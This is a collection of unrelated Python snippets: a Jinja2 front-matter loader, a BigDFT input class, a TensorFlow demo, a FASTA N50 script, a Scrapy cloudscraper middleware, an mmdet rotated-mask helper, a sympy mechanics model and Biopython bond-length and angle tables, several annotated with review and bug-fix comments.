            number_yaml_lines += 1
            offset = len(front_matter_match.group(0))
            # the closing delimiter must repeat the opening run exactly
            delim = re.compile("^" + front_matter_match.group(1) + "$")
            lines = contents.splitlines()
            for line in lines[1:]:  # skip the first line, the opening front matter
                # advance past this line (plus its newline) in the raw text
                offset += len(line) + len(newline)
                number_yaml_lines += 1
                if delim.match(line):
                    break
            # replace the stripped front matter with the same number of blank
            # lines so template line numbers stay accurate during compilation
            contents = (newline * number_yaml_lines) + contents[offset:]
        return StrangeCaseStr(contents, number_yaml_lines), filename, uptodate
    @internalcode
    def load(self, environment, name, globals=None):
        """
        If a ``StrangeCaseStr`` is found, ``str.number_yaml_lines`` are stripped
        off the front of the file after it is generated.
        NOTE(review): this mirrors ``jinja2.BaseLoader.load`` verbatim, with
        only the ``number_yaml_lines`` hand-off added at the end — keep it in
        sync with the installed Jinja2 version.
        """
        code = None
        if globals is None:
            globals = {}
        # first we try to get the source for this template together
        # with the filename and the uptodate function.
        source, filename, uptodate = self.get_source(environment, name)
        # try to load the code from the bytecode cache if there is a
        # bytecode cache configured.
        bcc = environment.bytecode_cache
        if bcc is not None:
            bucket = bcc.get_bucket(environment, name, filename, source)
            code = bucket.code
        # if we don't have code so far (not cached, no longer up to
        # date) etc. we compile the template
        if code is None:
            code = environment.compile(source, name, filename)
        # if the bytecode cache is available and the bucket doesn't
        # have a code so far, we give the bucket the new code and put
        # it back to the bytecode cache.
        if bcc is not None and bucket.code is None:
            bucket.code = code
            bcc.set_bucket(bucket)
        t = environment.template_class.from_code(environment, code, globals, uptodate)
        if isinstance(source, StrangeCaseStr):
            # propagate the blank-line count so render() can strip them
            t.number_yaml_lines = source.number_yaml_lines
        return t
def fix_path(path):
    """
    Return *path* with the OS path separator replaced by forward slashes.
    Jinja chokes on backslash-separated paths, and slash-separated paths work
    well enough in Windows anyway. See also Jinja2-99_, Jinja2-98_.
    .. _Jinja2-98: https://github.com/mitsuhiko/jinja2/issues/98
    .. _Jinja2-99: https://github.com/mitsuhiko/jinja2/pull/99
    Note: This function will also chomp any in-filename backslashes.
    Hopefully you don't have any of those in the relative path to your template.
    """
    return '/'.join(path.split(os.path.sep))
|
import click
# Reusable click option decorators shared across CLI commands.
# count=True means repeating the flag (e.g. -vv) raises/lowers verbosity
# by more than one step.
verbose = click.option(
    '--verbose', '-v', count=True, help="Increase verbosity.")
quiet = click.option(
    '--quiet', '-q', count=True, help="Decrease verbosity.")
|
"""Handling of the input options
This module contains the useful quantities to deal with the preparation and
the usage of inputfiles for BigDFT code. The main object is the
:class:`Inputfile` class, which inherits from a python dictionary. Such
inheritance is made possible by the internal representation of the BigDFT
inputfile, which employs the YAML syntax. This means that there is a one-to-one
correspondence between a python dictionary and a BigDFT inputfile.
"""
class Inputfile(dict):
    """ The BigDFT inputfile.
    Principal object needed to run a BigDFT calculation.
    Might be initialized either from a dictionary, a
    :py:class:`~BigDFT.Logfiles.Logfile` instance
    or a (yaml-compliant) filename path
    Note:
       Each of the actions of the module :py:mod:`~BigDFT.InputActions`, which
       is defined on a generic dictionary, also corresponds to a method of
       the `Inputfile` class, and it is applied to the class instance.
       Therefore also the first argument of the corresponding action is
       implicitly the class instance. For the
       :py:func:`~BigDFT.InputActions.remove` method, the action to be
       removed should come from the :py:mod:`~BigDFT.InputActions` module.
    .. _input_action_example:
    Example:
       >>> import InputActions as A, Inputfiles as I
       >>> inp=I.Inputfile()
       >>> inp.set_hgrids(0.3) # equivalent to A.set_hgrids(inp,0.3)
       >>> inp
       {'dft': {'hgrids': 0.3}}
       >>> inp.optimize_geometry() # equivalent to A.optimize_geometry(inp)
       >>> inp
       {'dft': {'hgrids': 0.3},'geopt': {'method': 'FIRE',
       'ncount_cluster_x': 50} }
       >>> # equivalent to A.remove(inp,A.optimize_geometry)
       >>> inp.remove(A.optimize_geometry)
       >>> inp
       {'dft': {'hgrids': 0.3}}
    .. todo ::
       Consider the possibility of initializing an `Inputfile` instance
       from a ``yaml`` file. And also from a
       :py:class:`~BigDFT.Logfiles.Logfile` class
    """
    def __init__(self, *args, **kwargs):
        """Initialize like a plain dict, then bind every public action of
        :py:mod:`BigDFT.InputActions` as an instance method."""
        # hoisted out of the loop: the original re-imported functools.partial
        # on every iteration
        from functools import partial
        import BigDFT.InputActions as A
        dict.__init__(self, *args, **kwargs)
        for action in dir(A):
            if "__" in action:
                continue  # skip dunder/private names
            func = getattr(A, action)
            bound = partial(func, self)
            # carry over the action's docstring so help() stays useful
            bound.__doc__ = func.__doc__
            setattr(self, action, bound)
|
# check palindrome practical 5
# A string is a palindrome when it is equal to its own reverse.


def is_palindrome(text):
    """Return True if *text* reads the same forwards and backwards.

    The comparison is exact (case- and whitespace-sensitive), matching the
    original script's behavior.
    """
    return text == text[::-1]


if __name__ == "__main__":
    # Guarded so importing this module does not block on input().
    s = input("Enter a string: ")
    if is_palindrome(s):
        print("It's a palindrome!")
    else:
        print("It's not a palindrome")
|
import tensorflow as tf
def main():
    # simple test: assign a tensor to a slice of another tensor
    # - then run some op depending on that assignment (control_dependency)
    # NOTE(review): this uses the TF1.x graph API (tf.assign, tf.Session,
    # tf.global_variables_initializer); it will not run under TF2 eager
    # execution without tf.compat.v1 — confirm the intended TF version.
    # the "buffer" to assign a slice to (a 2x2 matrix of zeros)
    buffer = tf.Variable(tf.zeros(shape=(2, 2)))
    # the slice (one row of length 2, all ones)
    slice_ = tf.Variable(tf.ones(shape=(2,)))
    # the slice assignment op (inserts slice_ as the second row into the buffer)
    insert_row = tf.assign(buffer[1,:], slice_)
    # need to add the control dependency here
    # - otherwise, the insert_row op would not be executed when calling sess.run(out)
    # because out is not directly dependent on the 'calculation' of the assignment
    with tf.control_dependencies([insert_row]):
        out = tf.identity(buffer, name="identity")
    with tf.Session() as sess:
        # variables must be initialized before any op that reads them
        sess.run(tf.global_variables_initializer())
        res = sess.run(out)
        print("Result is {}".format(res))
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
"""Print name, N50, longest sequence, and total length of a FASTA file (TSV)."""
import argparse
import os

import numpy as np
from scipy import stats  # NOTE(review): unused here; kept to preserve the import surface


def n50(lengths):
    """Return the N50 of a collection of sequence lengths.

    N50 is the length of the sequence at which the cumulative sum of the
    ascending sorted lengths first exceeds half of the total length.
    """
    ordered = sorted(lengths)
    cumulative = np.cumsum(ordered)
    return ordered[(cumulative > cumulative[-1] * 0.5).nonzero()[0][0]]


def main():
    # Guarded under __main__ so importing this module neither parses
    # sys.argv nor requires Biopython.
    parser = argparse.ArgumentParser()
    parser.add_argument('fasta', type=argparse.FileType('r'))
    args = parser.parse_args()

    from Bio import SeqIO  # only needed when actually run as a script
    lengths = sorted(len(record) for record in SeqIO.parse(args.fasta, 'fasta'))
    total = int(np.sum(lengths))
    print(os.path.splitext(os.path.basename(args.fasta.name))[0],
          n50(lengths), lengths[-1], total, sep='\t')


if __name__ == "__main__":
    main()
|
import asyncio
import urllib
from functools import partial
import twisted.internet
import cloudscraper
from scrapy.http import HtmlResponse
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from twisted.internet.defer import Deferred
import sys
from .settings import *
# On Windows the default Proactor event loop is incompatible with selector
# based reactors, so force the selector event loop policy first.
if sys.platform == 'win32':
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
reactor = AsyncioSelectorReactor(asyncio.get_event_loop())
# install AsyncioSelectorReactor
# NOTE(review): patches both the attribute and sys.modules so any later
# `from twisted.internet import reactor` gets this instance; must run at
# import time, before Scrapy installs its own reactor.
twisted.internet.reactor = reactor
sys.modules['twisted.internet.reactor'] = reactor
def as_deferred(f):
    """
    Wrap an awaitable (coroutine or asyncio Future) in a Twisted Deferred.

    Note: the conversion direction is asyncio -> Twisted: ``f`` is scheduled
    on the asyncio loop via ``ensure_future`` and the resulting future is
    exposed as a Deferred.  (The original docstring stated the reverse.)

    :param f: coroutine or asyncio future to wrap
    :return: twisted.internet.defer.Deferred firing with f's result
    """
    return Deferred.fromFuture(asyncio.ensure_future(f))
# NOTE(review): `logging` is not imported in this module directly; it is
# presumably re-exported by `from .settings import *` above — confirm.
logger = logging.getLogger('aroay_cloudscraper')
class CloudScraperMiddleware(object):
    """
    Downloader middleware that fetches requests through a cloudscraper
    session (to pass Cloudflare's anti-bot page) instead of Scrapy's
    default downloader.  Requests opt in via ``request.meta['aroay_cloudscraper']``.
    """

    def __init__(self):
        # One shared cloudscraper session, impersonating Firefox on Windows.
        self.scraper = cloudscraper.create_scraper(browser={
            'browser': 'firefox',
            'platform': 'windows',
            'mobile': False
        })

    def _block_get(self, url, *args, **kwargs):
        """Blocking HTTP GET performed with the cloudscraper session."""
        response = self.scraper.get(url, *args, **kwargs)
        return response

    async def _simple_run_in_executor(self, f, *args, async_loop=None, **kwargs):
        """Run the blocking callable `f` in the event loop's default executor."""
        loop = async_loop or asyncio.get_event_loop()
        response = await loop.run_in_executor(None, partial(f, *args, **kwargs))
        return response

    async def async_get(self, url, *args, **kwargs):
        """Coroutine wrapper around the blocking `_block_get`."""
        response = await self._simple_run_in_executor(self._block_get, url, *args, **kwargs)
        return response

    @classmethod
    def from_crawler(cls, crawler):
        """
        init the middleware from crawler settings
        :param crawler:
        :return: middleware instance
        """
        settings = crawler.settings
        logging_level = settings.get('AROAY_CLOUDSCRAPER_LOGGING_LEVEL', AROAY_CLOUDSCRAPER_LOGGING_LEVEL)
        logging.getLogger('websockets').setLevel(logging_level)
        logging.getLogger('aroay_cloudscraper').setLevel(logging_level)
        # note: these are set on the class, shared by all instances
        cls.download_timeout = settings.get('AROAY_CLOUDSCRAPER_DOWNLOAD_TIMEOUT',
                                            settings.get('DOWNLOAD_TIMEOUT', AROAY_CLOUDSCRAPER_DOWNLOAD_TIMEOUT))
        cls.delay = settings.get('AROAY_CLOUDSCRAPER_DELAY', AROAY_CLOUDSCRAPER_DELAY)
        return cls()

    async def _process_request(self, request, spider):
        """
        use aroay_cloudscraper to process spider
        :param request:
        :param spider:
        :return: HtmlResponse, or None to fall through to the default downloader
        """
        # get aroay_cloudscraper meta; absent/empty meta means "not for us"
        cloudscraper_meta = request.meta.get('aroay_cloudscraper') or {}
        logger.debug('cloudscraper_meta %s', cloudscraper_meta)
        if not isinstance(cloudscraper_meta, dict) or len(cloudscraper_meta.keys()) == 0:
            return
        # proxy configuration
        _proxy = cloudscraper_meta.get('proxy')
        logger.info("set proxy is %s" % _proxy)
        # request timeout: per-request value overrides the global default
        _timeout = self.download_timeout
        if cloudscraper_meta.get('timeout') is not None:
            _timeout = cloudscraper_meta.get('timeout')
        # BUG FIX: the meta key was 'cookies ' (trailing space), so cookies
        # supplied by spiders were silently ignored.
        _cookies = cloudscraper_meta.get('cookies')
        logger.debug('crawling %s', request.url)
        response = await self.async_get(request.url, proxies=_proxy, timeout=_timeout,
                                        cookies=_cookies)
        # optional post-request delay (simple rate limiting)
        _delay = self.delay
        if cloudscraper_meta.get('delay') is not None:
            _delay = cloudscraper_meta.get('delay')
        if _delay is not None:
            logger.debug('sleep for %ss', _delay)
            await asyncio.sleep(_delay)
        # wrap the raw requests response in a Scrapy HtmlResponse
        response = HtmlResponse(
            request.url,
            status=response.status_code,
            headers=response.headers,
            body=response.content,
            encoding='utf-8',
            request=request
        )
        return response

    def process_request(self, request, spider):
        """
        process request using aroay_cloudscraper
        :param request:
        :param spider:
        :return: Deferred wrapping the async processing
        """
        logger.debug('processing request %s', request)
        return as_deferred(self._process_request(request, spider))

    async def _spider_closed(self):
        # nothing to clean up; kept for interface symmetry
        pass

    def spider_closed(self):
        """
        callback when spider closed
        :return: Deferred
        """
        return as_deferred(self._spider_closed())
|
import numpy as np
# Compute double element-wise square of vector
def vsquaresquare(V):
    """Return the double element-wise square of V, i.e. (V**2)**2 == V**4.

    BUG FIX: the original computed R but never returned it, so the function
    always returned None.
    """
    R = np.power(np.power(V, 2), 2)
    return R
|
import torch
import numpy as np
import mmcv
import cv2
def mask_rotate_target(pos_proposals_list, pos_assigned_gt_inds_list, gt_masks_list,
                       cfg):
    """Compute rotated mask targets for every image and concatenate them.

    Applies `mask_rotate_target_single` per image (the same `cfg` is used
    for each) and concatenates all per-image targets into one tensor.
    """
    num_imgs = len(pos_proposals_list)
    per_image = map(mask_rotate_target_single, pos_proposals_list,
                    pos_assigned_gt_inds_list, gt_masks_list,
                    [cfg] * num_imgs)
    return torch.cat(list(per_image))
def crop_rotate_mask(gt_mask, x, y, w, h, theta):
    """Crop a w x h window at angle `theta` (radians) around (x, y) from a mask.

    The mask is padded into a 2x-sized canvas so the rotation cannot clip it,
    rotated about the (shifted) center, translated so the window's top-left
    lands at the origin, and finally cropped to (h, w).
    """
    rows, cols = gt_mask.shape
    # pad into a double-sized canvas, mask centered
    expand_layer = np.zeros((rows*2, cols*2), dtype='uint8')
    rows_start = int(rows / 2)
    cols_start = int(cols / 2)
    expand_layer[rows_start:rows_start+rows, cols_start:cols_start+cols] = gt_mask
    # rotate about the box center (theta is radians; cv2 expects degrees)
    M = cv2.getRotationMatrix2D((x+cols_start, y+rows_start), theta*180/np.pi, 1)
    dst = cv2.warpAffine(expand_layer, M, expand_layer.shape[::-1], borderValue=0)
    # translate so the window's top-left corner moves to (0, 0)
    M = np.float32([[1.0, 0, -x+w/2-cols_start], [0, 1, -y+h/2-rows_start]])
    dst = cv2.warpAffine(dst, M, dst.shape[::-1], borderValue=0)
    # BUG FIX: np.int was removed in NumPy 1.24 (deprecated since 1.20);
    # the builtin int truncates identically.
    dst = dst[:int(h), :int(w)]
    return dst
def mask_rotate_target_single(pos_proposals, pos_assigned_gt_inds, gt_masks, cfg):
    """Build (mask_size x mask_size) rotated mask targets for one image.

    Each positive proposal (x, y, w, h, theta) is cropped from its assigned
    ground-truth mask via `crop_rotate_mask` and resized to cfg.mask_size.
    Returns a float tensor on the proposals' device; an empty tensor of shape
    (0, mask_size, mask_size) when there are no positives.
    """
    mask_size = cfg.mask_size
    if pos_proposals.size(0) == 0:
        return pos_proposals.new_zeros((0, mask_size, mask_size))
    proposals_np = pos_proposals.cpu().numpy()
    gt_inds = pos_assigned_gt_inds.cpu().numpy()
    targets = []
    for bbox, gt_ind in zip(proposals_np, gt_inds):
        x, y, w, h, theta = bbox
        # guard against degenerate (zero-sized) boxes
        w = np.maximum(w, 1)
        h = np.maximum(h, 1)
        cropped = crop_rotate_mask(gt_masks[gt_ind], x, y, w, h, theta)
        # mask is uint8 both before and after resizing
        targets.append(mmcv.imresize(cropped, (mask_size, mask_size)))
    stacked = torch.from_numpy(np.stack(targets)).float()
    return stacked.to(pos_proposals.device)
|
import sympy.physics.mechanics as me
import sympy as sm
import math as m
import numpy as np
# Generalized coordinates and their first/second time derivatives.
q1, q2 = me.dynamicsymbols("q1 q2")
q1d, q2d = me.dynamicsymbols("q1 q2", 1)
q1d2, q2d2 = me.dynamicsymbols("q1 q2", 2)
# System parameters: length l, mass m, gravity g.
l, m, g = sm.symbols("l m g", real=True)
# Inertial frame with a fixed origin point pn (zero velocity).
frame_n = me.ReferenceFrame("n")
point_pn = me.Point("pn")
point_pn.set_vel(frame_n, 0)
# Auxiliary frame a, rotated about n.z by the angle of the position vector.
theta1 = sm.atan(q2 / q1)
frame_a = me.ReferenceFrame("a")
frame_a.orient(frame_n, "Axis", [theta1, frame_n.z])
# Particle located at (q1, q2) in the inertial frame.
particle_p = me.Particle("p", me.Point("p_pt"), sm.Symbol("m"))
particle_p.point.set_pos(point_pn, q1 * frame_n.x + q2 * frame_n.y)
particle_p.mass = m
# NOTE(review): velocity is set from pn.pos_from(p) = -r, so this is -dr/dt
# — confirm the sign is intended.
particle_p.point.set_vel(frame_n, (point_pn.pos_from(particle_p.point)).dt(frame_n))
# Velocity component along a.x, used below as a velocity (motion) constraint.
f_v = me.dot((particle_p.point.vel(frame_n)).express(frame_a), frame_a.x)
# Gravity acts along n.x in this formulation.
force_p = particle_p.mass * (g * frame_n.x)
dependent = sm.Matrix([[0]])
dependent[0] = f_v
velocity_constraints = [i for i in dependent]
# Generalized speeds and kinematic differential equations qd = u.
u_q1d = me.dynamicsymbols("u_q1d")
u_q2d = me.dynamicsymbols("u_q2d")
kd_eqs = [q1d - u_q1d, q2d - u_q2d]
forceList = [(particle_p.point, particle_p.mass * (g * frame_n.x))]
# Kane's method with u_q1d treated as dependent via the velocity constraint.
kane = me.KanesMethod(
    frame_n,
    q_ind=[q1, q2],
    u_ind=[u_q2d],
    u_dependent=[u_q1d],
    kd_eqs=kd_eqs,
    velocity_constraints=velocity_constraints,
)
fr, frstar = kane.kanes_equations([particle_p], forceList)
# Equations of motion: Fr + Fr* = 0.
zero = fr + frstar
# Holonomic configuration constraint: |r| = l (constant distance from origin).
f_c = point_pn.pos_from(particle_p.point).magnitude() - l
config = sm.Matrix([[0]])
config[0] = f_c
# Append the configuration constraint as an extra row of the system.
zero = zero.row_insert(zero.shape[0], sm.Matrix([[0]]))
zero[zero.shape[0] - 1] = config[0]
|
import pixellib
from pixellib.instance import custom_segmentation
# Run instance segmentation with a custom-trained Mask R-CNN model.
segment_image = custom_segmentation()
# num_classes counts the non-background classes; class_names[0] must be "BG".
segment_image.inferConfig(num_classes= 2, class_names= ["BG", "butterfly", "squirrel"])
# load the trained model weights from the local checkpoint file
segment_image.load_model("mask_rcnn_model.005-0.443756.h5")
# segment the input image, drawing bounding boxes as well as masks,
# and write the annotated result to sample_out.jpg
segment_image.segmentImage("butterfly (1).jpg", show_bboxes=True, output_image_name="sample_out.jpg")
|
# Copyright (C) 2011 by Michele Silva (michele.silva@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
""" Bond length and angle constants.
These constants are primarily extracted from Engh, Huber, 1991.
Engh R A & Huber R (1991). Accurate bond and angle parameters for X-ray protein
structure refinement. Acta Cryst., A47, 392-400. DOI: 10.1107/S0108767391001071
"""
import math
class DefaultValueDict(dict):
    """ Dictionary that yields a fixed default value for any missing key. """
    def __init__(self, default, values=None, **kwds):
        """
        @param default: The value returned when a key is absent.
        @type: object
        @param values: Initial contents of the dictionary.
        @type: list or dict
        """
        if values:
            dict.__init__(self, values)
        self.update(kwds)
        self.default = default
    def __getitem__(self, key):
        # Missing keys yield the default instead of raising KeyError;
        # membership tests (`in`) are unaffected.
        if dict.__contains__(self, key):
            return dict.__getitem__(self, key)
        return self.default
    def __copy__(self):
        # Shallow copy carrying over both the entries and the default.
        return DefaultValueDict(self.default, self)
# Canonical PDB atom names: heavy atoms, hydrogens, terminal OXT, and the
# XX/XS/XO/XN/XC/XH placeholders.  Order matters: `get_bond_length` uses
# list positions to recognise the hydrogen range ('H' .. 'H3').
ATOMS = [
    'N', 'CA', 'C', 'O', 'CB', 'SG', 'OG', 'OG1', 'CG', 'CG1',
    'CG2', 'SD', 'OD1', 'OD2', 'ND1', 'ND2', 'CD', 'CD1', 'CD2', 'OE1',
    'OE2', 'NE', 'NE1', 'NE2', 'CE', 'CE1', 'CE2', 'CE3', 'NZ', 'CZ',
    'CZ2', 'CZ3', 'OH', 'NH1', 'NH2', 'CH2', 'CM', 'H', 'HA', 'HA1',
    'HA2', 'HA3', 'HB', 'HB1', 'HB2', 'HB3', 'HG', 'HG1', 'HG2', 'HG3',
    'HG11', 'HG12', 'HG13', 'HG21', 'HG22', 'HG23', 'HD1', 'HD2', 'HD3',
    'HD11', 'HD12', 'HD13', 'HD21', 'HD22', 'HD23', 'HE', 'HE1', 'HE2',
    'HE3', 'HE21', 'HE22', 'HH', 'HH2', 'HH11', 'HH12', 'HH21', 'HH22',
    'HZ', 'HZ1', 'HZ2', 'HZ3', 'H1', 'H2', 'H3', 'OXT', 'XX', 'XS',
    'XO', 'XN', 'XC', 'XH',
]
# Per-residue overrides for the N-CA-CB / CB-CA-C bond angles (degrees) and
# the CA-CB bond length (Å); DefaultValueDict falls back to the generic value.
ANGLE_N_CA_CB = DefaultValueDict(110.5, {'ALA':110.4, 'ILE':111.5, 'THR':111.5, 'VAL':111.5,'PRO':103.0})
ANGLE_CB_CA_C = DefaultValueDict(110.1, {'ALA':110.5, 'ILE':109.1, 'THR':109.1, 'VAL':109.1})
BOND_LENGTH_CA_CB = DefaultValueDict(1.530, {'ALA':1.521, 'ILE':1.540, 'THR':1.540, 'VAL':1.540})
# Peptide-bond geometry: O-C-N angle (degrees) and C-N / C-O lengths (Å).
ANGLE_O_C_N = DefaultValueDict(123.0, {'PRO':122.0})
BOND_LENGTH_C_N = DefaultValueDict(1.329, {'PRO':1.341})
BOND_LENGTH_C_O = 1.231
# Main-chain bond lengths (Å), keyed by alphabetically ordered atom pair
# (see `get_bond_length`, which sorts the pair before lookup); per-residue
# overrides via DefaultValueDict.
BOND_LENGTH_MAINCHAIN = {
    ('CA', 'N'): DefaultValueDict(1.458, {'GLY': 1.451, 'PRO': 1.466}),
    ('C', 'CA'): DefaultValueDict(1.525, {'GLY': 1.516}),
    ('C', 'N'): DefaultValueDict(1.329, {'PRO': 1.341}),
    ('CA', 'CB'): DefaultValueDict(1.530, {'ALA': 1.521, 'ILE': 1.540, 'THR': 1.540, 'VAL': 1.540}),
    ('C', 'O'): DefaultValueDict(1.231),
    ('C', 'OXT'): DefaultValueDict(1.231),
    # virtual CA-CA distance between consecutive residues
    ('CA', 'CA'): DefaultValueDict(3.8),
}
# Side-chain bond lengths (Å) from Engh & Huber (1991), keyed by residue and
# then by alphabetically ordered atom pair (see `get_bond_length`).
BOND_LENGTH_SIDECHAIN = {
    'CYS': {('CB', 'SG'): 1.808},
    'ASP': {('CB', 'CG'): 1.516, ('CG', 'OD1'): 1.249, ('CG', 'OD2'): 1.249},
    'GLU': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.516, ('CD', 'OE1'): 1.249,
            ('CD', 'OE2'): 1.249},
    'PHE': {('CB', 'CG'): 1.502, ('CD1', 'CG'): 1.384, ('CD2', 'CG'): 1.384,
            ('CD1', 'CE1'): 1.382, ('CD2', 'CE2'): 1.382, ('CE1', 'CZ'): 1.382,
            ('CE2', 'CZ'): 1.382},
    # BUG FIX: the first HIS entry was keyed ('CB', 'CD') — histidine has no
    # CB-CD bond, so CB-CG lookups silently fell back to the pseudo value.
    # 1.497 is the Engh & Huber CB-CG length for histidine.
    'HIS': {('CB', 'CG'): 1.497, ('CG', 'ND1'): 1.371, ('CD2', 'CG'): 1.356,
            ('CE1', 'ND1'): 1.319, ('CD2', 'NE2'): 1.374, ('CE1', 'NE2'): 1.374},
    'ILE': {('CB', 'CG1'): 1.530, ('CB', 'CG2'): 1.521, ('CD1', 'CG1'): 1.513},
    'LYS': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.520, ('CD', 'CE'): 1.520,
            ('CE', 'NZ'): 1.489},
    'LEU': {('CB', 'CG'): 1.530, ('CD1', 'CG'): 1.521, ('CD2', 'CG'): 1.521},
    'MET': {('CB', 'CG'): 1.520, ('CG', 'SD'): 1.803, ('CE', 'SD'): 1.791},
    'ASN': {('CB', 'CG'): 1.520, ('CG', 'OD1'): 1.231, ('CG', 'ND2'): 1.328},
    'PRO': {('CB', 'CG'): 1.492, ('CD', 'CG'): 1.503},
    'GLN': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.516, ('CD', 'OE1'): 1.231,
            ('CD', 'NE2'): 1.328},
    'ARG': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.520, ('CD', 'NE'): 1.460,
            ('CZ', 'NE'): 1.329, ('CZ', 'NH1'): 1.326, ('CZ', 'NH2'): 1.326},
    'SER': {('CB', 'OG'): 1.417},
    'THR': {('CB', 'OG1'): 1.433, ('CB', 'CG2'): 1.521},
    'VAL': {('CB', 'CG1'): 1.521, ('CB', 'CG2'): 1.521},
    'TRP': {('CB', 'CG'): 1.498, ('CD1', 'CG'): 1.433, ('CD2', 'CG'): 1.365,
            ('CD1', 'NE1'): 1.374, ('CE2', 'NE1'): 1.370, ('CD2', 'CE2'): 1.409,
            ('CD2', 'CE3'): 1.398, ('CE2', 'CZ2'): 1.394, ('CH2', 'CZ2'): 1.368,
            ('CE3', 'CZ3'): 1.382, ('CH2', 'CZ3'): 1.400},
    'TYR': {('CB', 'CG'): 1.512, ('CD1', 'CG'): 1.389, ('CD2', 'CG'): 1.389,
            ('CD1', 'CE1'): 1.382, ('CD2', 'CE2'): 1.382, ('CE1', 'CZ'): 1.378,
            ('CE2', 'CZ'): 1.378, ('OH', 'CZ'): 1.376},
}
# Fallback per-residue pseudo side-chain lengths (Å) used by `get_bond_length`
# when no explicit entry exists for an atom pair.
BOND_LENGTH_PSEUDO_SIDECHAIN = {'ALA': 1.54, 'CYS': 2.8, 'ASP': 2.92, 'GLU': 3.125,
    'PHE': 3.79, 'GLY': 1.0, 'HIS': 3.57, 'ILE': 2.7, 'LYS': 4.6, 'LEU': 3.05,
    'MET': 3.185, 'ASN': 2.91, 'PRO': 2.29, 'GLN': 3.875, 'ARG': 4.8, 'SER': 2.43,
    'THR': 2.17, 'VAL': 2.19, 'TRP': 4.2, 'TYR': 4.27}
# Main-chain bond angles (degrees) keyed by atom triple, with per-residue
# overrides (values from Engh & Huber, 1991).
BOND_ANGLE_MAINCHAIN = {
    ('C', 'N', 'CA'): DefaultValueDict(121.7, {'GLY': 120.6, 'PRO': 122.6}),
    ('N', 'CA', 'C'): DefaultValueDict(111.2, {'GLY': 112.5, 'PRO': 111.8}),
    # BUG FIX: the PRO value was 1116.9 — an impossible bond angle (>360°).
    # Engh & Huber give 116.9° for the proline CA-C-N angle.
    ('CA', 'C', 'N'): DefaultValueDict(116.2, {'GLY': 116.4, 'PRO': 116.9}),
    ('CA', 'C', 'O'): DefaultValueDict(120.8, {'GLY': 120.8}),
    ('CA', 'C', 'OXT'): DefaultValueDict(117.0),
}
# Side-chain bond angles (degrees) from Engh & Huber (1991), keyed by residue
# and then by ordered atom triple (see `get_bond_angle`).
BOND_ANGLE_SIDECHAIN = {
    'CYS': {('CA', 'CB', 'SG'): 114.4},
    'ASP': {('CA', 'CB', 'CG'): 112.6, ('CB', 'CG', 'OD1'): 118.4,
            ('CB', 'CG', 'OD2'): 118.4},
    'GLU': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 112.6,
            ('CG', 'CD', 'OE1'): 118.4, ('CG', 'CD', 'OE2'): 118.4},
    'PHE': {('CA', 'CB', 'CG'): 113.8, ('CB', 'CG', 'CD1'): 120.7,
            ('CD1', 'CG', 'CD2'): 118.6, ('CG', 'CD1', 'CE1'): 120.7,
            ('CG', 'CD2', 'CE2'): 120.7, ('CD1', 'CE1', 'CZ'): 120.0,
            ('CD2', 'CE2', 'CZ'): 120.0, ('CE2', 'CZ', 'CE1'): 120.0},
    'HIS': {('CA', 'CB', 'CG'): 113.8, ('CB', 'CG', 'ND1'): 121.6,
            ('ND1', 'CG', 'CD2'): 109.3, ('CG', 'ND1', 'CE1'): 105.6,
            ('CG', 'CD2', 'NE2'): 106.5, ('ND1', 'CE1', 'NE2'): 111.7,
            ('CD2', 'NE2', 'CE1'): 107.0},
    'ILE': {('CA', 'CB', 'CG1'): 110.4, ('CA', 'CB', 'CG2'): 110.5,
            ('CB', 'CG1', 'CD1'): 113.8},
    'LYS': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 111.3,
            ('CG', 'CD', 'CE'): 111.3, ('CD', 'CE', 'NZ'): 111.9},
    'LEU': {('CA', 'CB', 'CG'): 116.3, ('CB', 'CG', 'CD1'): 110.7,
            ('CB', 'CG', 'CD2'): 110.7},
    'MET': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'SD'): 112.7,
            ('CG', 'SD', 'CE'): 100.9},
    'ASN': {('CA', 'CB', 'CG'): 112.6, ('CB', 'CG', 'OD1'): 120.8,
            ('CB', 'CG', 'ND2'): 116.4},
    'PRO': {('CA', 'CB', 'CG'): 104.5, ('CB', 'CG', 'CD'): 106.1},
    'GLN': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 112.6,
            ('CG', 'CD', 'OE1'): 120.8, ('CG', 'CD', 'NE2'): 116.4},
    'ARG': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 111.3,
            ('CG', 'CD', 'NE'): 112.0, ('CD', 'NE', 'CZ'): 124.2,
            ('NE', 'CZ', 'NH1'): 120.0, ('NE', 'CZ', 'NH2'): 120.0},
    'SER': {('CA', 'CB', 'OG'): 111.1},
    'THR': {('CA', 'CB', 'OG1'): 109.6, ('CA', 'CB', 'CG2'): 110.5},
    'VAL': {('CA', 'CB', 'CG1'): 110.5, ('CA', 'CB', 'CG2'): 110.5},
    'TRP': {('CA', 'CB', 'CG'): 113.6, ('CB', 'CG', 'CD1'): 126.8,
            ('CD1', 'CG', 'CD2'): 106.3, ('CG', 'CD1', 'NE1'): 110.2,
            ('CG', 'CD2', 'CE2'): 107.2, ('CE2', 'CD2', 'CE3'): 118.9,
            # BUG FIX: the CZ3 triple was keyed ('CD2', 'CE', 'CZ3');
            # tryptophan has no 'CE' atom — the middle atom is CE3.
            ('CD2', 'CE2', 'CZ2'): 122.4, ('CD2', 'CE3', 'CZ3'): 118.6,
            ('CE3', 'CZ3', 'CH2'): 121.1},
    'TYR': {('CA', 'CB', 'CG'): 113.9, ('CB', 'CG', 'CD1'): 120.8,
            ('CD1', 'CG', 'CD2'): 118.4, ('CG', 'CD1', 'CE1'): 121.2,
            ('CG', 'CD2', 'CE2'): 121.2, ('CD1', 'CE1', 'CZ'): 119.6,
            ('CD2', 'CE2', 'CZ'): 119.6, ('CE1', 'CZ', 'OH'): 119.9},
}
# Fallback per-residue pseudo side-chain angles (degrees) used by
# `get_bond_angle` when no explicit entry exists for an atom triple.
